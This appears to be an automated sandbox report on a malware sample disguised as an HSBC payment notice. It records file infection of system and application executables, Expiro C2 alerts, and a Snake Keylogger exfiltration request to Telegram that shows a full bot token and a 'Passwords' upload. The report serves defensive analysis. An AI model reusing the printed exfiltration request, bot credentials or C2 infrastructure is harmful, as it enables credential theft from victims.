              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000004.00000003.1875324532.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000004.00000003.1790951531.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000004.00000003.1423264102.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1427509950.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1422433312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000004.00000003.1881243622.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000004.00000003.1821282243.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000004.00000003.1923223807.0000000000930000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000004.00000003.1917141745.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000004.00000003.1384712298.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.4.dr
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000004.00000003.1930594845.0000000000930000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1938936279.0000000000700000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1332580741.0000000004890000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1327392894.00000000046F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000004.00000003.1547399003.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000004.00000003.1502999442.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000004.00000003.1502999442.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000004.00000003.1828436322.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1316924828.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000004.00000003.1388415236.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: armsvc.exe, 00000004.00000003.1348039233.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1316924828.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000004.00000003.1358380690.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000004.00000003.1434957470.0000000001F70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1428827763.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000004.00000003.1634257256.0000000001F90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vds.pdbGCTL source: vds.exe.4.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: unpack200.exe.4.dr
              Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000004.00000003.1495681450.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000004.00000003.2027358358.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.4.dr
              Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000004.00000003.1461927383.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000004.00000003.1881243622.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb source: AdobeCollabSync.exe.4.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000004.00000003.1828436322.0000000002010000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000004.00000003.2027358358.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.4.dr

              Spreading

              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\wbem\WmiApSrv.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\vds.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | System file written: C:\Windows\System32\alg.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\7-Zip\7zFM.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\snmptrap.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\Spectrum.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\Locator.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\7-Zip\7z.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | System file written: C:\Windows\System32\AppVClient.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\SysWOW64\perfhost.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\7-Zip\7zG.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\msiexec.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\VSSVC.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\wbengine.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\SearchIndexer.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\TieringEngineService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\AgentService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\FXSSVC.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\SensorDataService.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\msdtc.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046C6D1 FindFirstFileW,FindClose
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B4B841h | 5_2_00B4B590
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B4C212h | 5_2_00B4BDF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B4F4A2h | 5_2_00B4F1F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B4C212h | 5_2_00B4C13F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B4E798h | 5_2_00B4E4F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B4FA30h | 5_2_00B4F788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B4EBF0h | 5_2_00B4E948
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B4F048h | 5_2_00B4EDA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00B4C212h | 5_2_00B4BDE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6969Dh | 5_2_05D69360
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6D828h | 5_2_05D6D580
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D68051h | 5_2_05D67DA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6C010h | 5_2_05D6BD68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6B760h | 5_2_05D6B4B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6AEB0h | 5_2_05D6AC08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6F238h | 5_2_05D6EF90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6AA58h | 5_2_05D6A7B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D691B1h | 5_2_05D68F08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6E988h | 5_2_05D6E6E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D68901h | 5_2_05D68658
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6E0D8h | 5_2_05D6DE30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6DC80h | 5_2_05D6D9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6BBB8h | 5_2_05D6B910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6D3D0h | 5_2_05D6D128
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6FAE8h | 5_2_05D6F840
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6B308h | 5_2_05D6B060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6F690h | 5_2_05D6F3E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6EDE0h | 5_2_05D6EB38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D6E530h | 5_2_05D6E288
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D68D59h | 5_2_05D68AB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05D684A9h | 5_2_05D68200

              Networking

              Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:64298 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49716 -> 54.244.188.177:80
              Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:63892 -> 1.1.1.1:53
              Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49872 -> 82.112.184.197:80
              Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49736 -> 149.154.167.220:443
              Source: unknown | DNS query: name: api.telegram.org
              Source: global traffic | HTTP traffic detected:
                  GET /xml/8.46.123.175 HTTP/1.1
                  Host: reallyfreegeoip.org
                  Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected:
                  POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1
                  Content-Type: multipart/form-data; boundary================8dd1904d11bd5d8
                  Host: api.telegram.org
                  Content-Length: 1090
                  Connection: Keep-Alive
              Source: Joe Sandbox View | IP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox View | IP Address: 172.234.222.143 172.234.222.143
              Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknown | DNS query: name: checkip.dyndns.org
              Source: unknown | DNS query: name: reallyfreegeoip.org
              Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.7:49727
              Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.7:49727
